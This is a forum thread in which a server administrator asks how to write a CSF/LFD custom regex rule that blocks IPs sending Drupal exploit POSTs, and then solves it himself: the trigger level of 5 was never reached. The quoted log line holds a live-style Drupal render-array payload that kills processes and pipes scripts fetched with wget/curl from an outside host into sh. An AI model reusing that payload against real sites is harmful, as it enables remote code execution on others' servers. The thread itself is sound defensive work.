regex.custom.pm to block Drupal vulnerability POSTs

[madeye]

Hello,

I've been using CSF & LFD for years and it's done very well for me. However I'm attempting something I haven't done before and am having trouble getting it to work. I am trying to block IP addresses that are attempting to POST command lines (nohup, wget etc) into perceived Drupal vulnerabilities. The vulnerabilities are long gone but these attempts are generating significant traffic.

This is an example of the offending log line:

Code: Select all

92.63.103.241 - - [24/Oct/2018:11:49:31 +0200] "POST //?q=user/password&name[%23post_render][]=passthru&name[%23markup]=kill%20-9%20-1;%20nohup%20wget%20-O%20-%20http://164.132.159.56/drupal/ups.sh%7Csh%20&;%20nohup%20curl%20%20http://164.132.159.56/drupal/ups.jpg%7Csh%20&&name[%23type]=markup HTTP/1.1" 200 30

So, I want to block IP addresses from apache logs that match the following regexp (just attempting nohup for now):

Code: Select all

^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*

I updated the CUSTOM1 logline in csf.conf to look like this:

Code: Select all

CUSTOM1_LOG = "/var/log/httpd/flashbase*"

And added the following to regex.custom.pm:

Code: Select all

    if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /^(\d+\.\d+\.\d+\.\d+) \- \-.*POST .*nohup.*))/ {
        return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
    }

When I restart csf & lfd I get the following lines in lfd.log:

Code: Select all

Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_access_log...
Oct 24 12:32:12 xxxx lfd[1408]: Watching /var/log/httpd/flashbase_error_log...

However this has absolutely no effect (I attempted a POST myself, plus a whole bunch of malicious ones occurred after csf & lfd were restarted).

Suspecting it might be an issue with the regexp, I made it was simple as possible, blocking any entry in the logfile containing what looks like an IP address:

Code: Select all

    if (($globlogs{CUSTOM1_LOG}{$lgfile}) and ($line =~ /.*(\d+\.\d+\.\d+\.\d+).*/)) {
        return ("drupal nohup POST attack from",$1,"drupal_nohup","5","80,443","10");
    }

Still no joy, try as I might I just cannot get csf/lfd to block me on this rule (I can access the server from a different IP so it's fine if it blocks the one I was testing from).

Are there configuration steps that are required to enable custom.regex.pm? Am I missing something here?

Any help gratefully appreciated

[madeye]

HAH! My bad: I didn't understand the meaning of the "trigger level for blocking".

It represents the number of times someone can trigger the rule before they are blocked - I thought it was some kind of priority index. To be fair it doesn't seem to be documented in detail anywhere (but link me if there are docs :-) )

So in my example it was set to 5 the default & I was only trying it 2-3 times before thinking it wasn't working.